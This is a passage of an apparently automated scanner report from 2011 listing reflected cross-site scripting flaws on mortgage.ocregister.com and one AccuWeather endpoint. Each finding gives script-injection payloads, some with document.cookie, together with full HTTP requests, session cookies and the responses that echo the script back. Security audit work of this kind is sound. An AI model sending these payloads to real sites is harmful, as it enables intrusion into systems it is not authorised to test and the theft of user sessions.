The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b243<script>alert(1)</script>b89f925ed73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd"><script>alert(document.cookie)</script>1f35e8c0ea2/feed5b243<script>alert(1)</script>b89f925ed73/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62675
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... </script>1f35e8c0ea2/feed5b243<script>alert(1)</script>b89f925ed73/feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a614"><script>alert(1)</script>e492f5d219d was submitted in the REST URL parameter 1. This input was echoed as 4a614\"><script>alert(1)</script>e492f5d219d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd%2522%253E%253Cscript%253Ealert(14a614"><script>alert(1)</script>e492f5d219d HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(14a614\"><script>alert(1)</script>e492f5d219dfeed/" /> ...[SNIP]...
4.389. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/feeda71cd%2522%253E%253Cscript%253Ealert(1
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee1f2"><script>alert(1)</script>14894bf18ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee1f2\"><script>alert(1)</script>14894bf18ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd%2522%253E%253Cscript%253Ealert(1?ee1f2"><script>alert(1)</script>14894bf18ef=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62689
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1?ee1f2\"><script>alert(1)</script>14894bf18ef=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2efa0"><script>alert(1)</script>c5d2576f89d was submitted in the REST URL parameter 1. This input was echoed as 2efa0\"><script>alert(1)</script>c5d2576f89d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie2efa0"><script>alert(1)</script>c5d2576f89d HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie2efa0\"><script>alert(1)</script>c5d2576f89dfeed/" /> ...[SNIP]...
4.391. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19724"><script>alert(1)</script>5a15440a445 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19724\"><script>alert(1)</script>5a15440a445 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie?19724"><script>alert(1)</script>5a15440a445=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... el="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie?19724\"><script>alert(1)</script>5a15440a445=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7804f"><script>alert(1)</script>b31526e044f was submitted in the REST URL parameter 1. This input was echoed as 7804f\"><script>alert(1)</script>b31526e044f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /files7804f"><script>alert(1)</script>b31526e044f HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62648
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/files7804f\"><script>alert(1)</script>b31526e044ffeed/" /> ...[SNIP]...
4.393. http://mortgage.ocregister.com/files [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/files
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcea"><script>alert(1)</script>d63783f7e5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bcea\"><script>alert(1)</script>d63783f7e5a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /files?3bcea"><script>alert(1)</script>d63783f7e5a=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/files?3bcea\"><script>alert(1)</script>d63783f7e5a=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12f7c"><script>alert(1)</script>5e4882fdc7d was submitted in the REST URL parameter 1. This input was echoed as 12f7c\"><script>alert(1)</script>5e4882fdc7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17b7a"><script>alert(1)</script>df3c8a873d1 was submitted in the REST URL parameter 2. This input was echoed as 17b7a\"><script>alert(1)</script>df3c8a873d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92232"><script>alert(1)</script>8606eb47764 was submitted in the REST URL parameter 3. This input was echoed as 92232\"><script>alert(1)</script>8606eb47764 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 766d1"><script>alert(1)</script>8572d6a55e6 was submitted in the REST URL parameter 1. This input was echoed as 766d1\"><script>alert(1)</script>8572d6a55e6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /766d1"><script>alert(1)</script>8572d6a55e6/plugins/democracy/basic.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/766d1\"><script>alert(1)</script>8572d6a55e6/plugins/democracy/basic.cssfeed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1fb8"><script>alert(1)</script>a22401a108a was submitted in the REST URL parameter 1. This input was echoed as e1fb8\"><script>alert(1)</script>a22401a108a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e1fb8"><script>alert(1)</script>a22401a108a/plugins/democracy/democracy.js HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:14 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62657
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/e1fb8\"><script>alert(1)</script>a22401a108a/plugins/democracy/democracy.jsfeed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf114"><script>alert(1)</script>95836e536ce was submitted in the REST URL parameter 1. This input was echoed as cf114\"><script>alert(1)</script>95836e536ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cf114"><script>alert(1)</script>95836e536ce/plugins/democracy/style.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:11 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/cf114\"><script>alert(1)</script>95836e536ce/plugins/democracy/style.cssfeed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62930"><script>alert(1)</script>7b7b2ccc4d6 was submitted in the REST URL parameter 1. This input was echoed as 62930\"><script>alert(1)</script>7b7b2ccc4d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /62930"><script>alert(1)</script>7b7b2ccc4d6/themes/onSet/style.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62650
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/62930\"><script>alert(1)</script>7b7b2ccc4d6/themes/onSet/style.cssfeed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce7f3"><script>alert(1)</script>dcab4cc6610 was submitted in the REST URL parameter 1. This input was echoed as ce7f3\"><script>alert(1)</script>dcab4cc6610 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ce7f3"><script>alert(1)</script>dcab4cc6610/js/swfobject.js?ver=2.2 HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:01:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:01:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62650
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/ce7f3\"><script>alert(1)</script>dcab4cc6610/js/swfobject.js?ver=2.2feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f534"><script>alert(1)</script>e883ec4e0ce was submitted in the REST URL parameter 1. This input was echoed as 3f534\"><script>alert(1)</script>e883ec4e0ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /3f534"><script>alert(1)</script>e883ec4e0ce/wlwmanifest.xml HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/3f534\"><script>alert(1)</script>e883ec4e0ce/wlwmanifest.xmlfeed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86904"><script>alert(1)</script>1d2a8825119 was submitted in the REST URL parameter 1. This input was echoed as 86904\"><script>alert(1)</script>1d2a8825119 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /xmlrpc.php86904"><script>alert(1)</script>1d2a8825119?rsd HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62658
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/xmlrpc.php86904\"><script>alert(1)</script>1d2a8825119?rsdfeed/" /> ...[SNIP]...
The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacc4"%3balert(1)//bc4341ec3d3 was submitted in the lang parameter. This input was echoed as dacc4";alert(1)//bc4341ec3d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=engdacc4"%3balert(1)//bc4341ec3d3&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
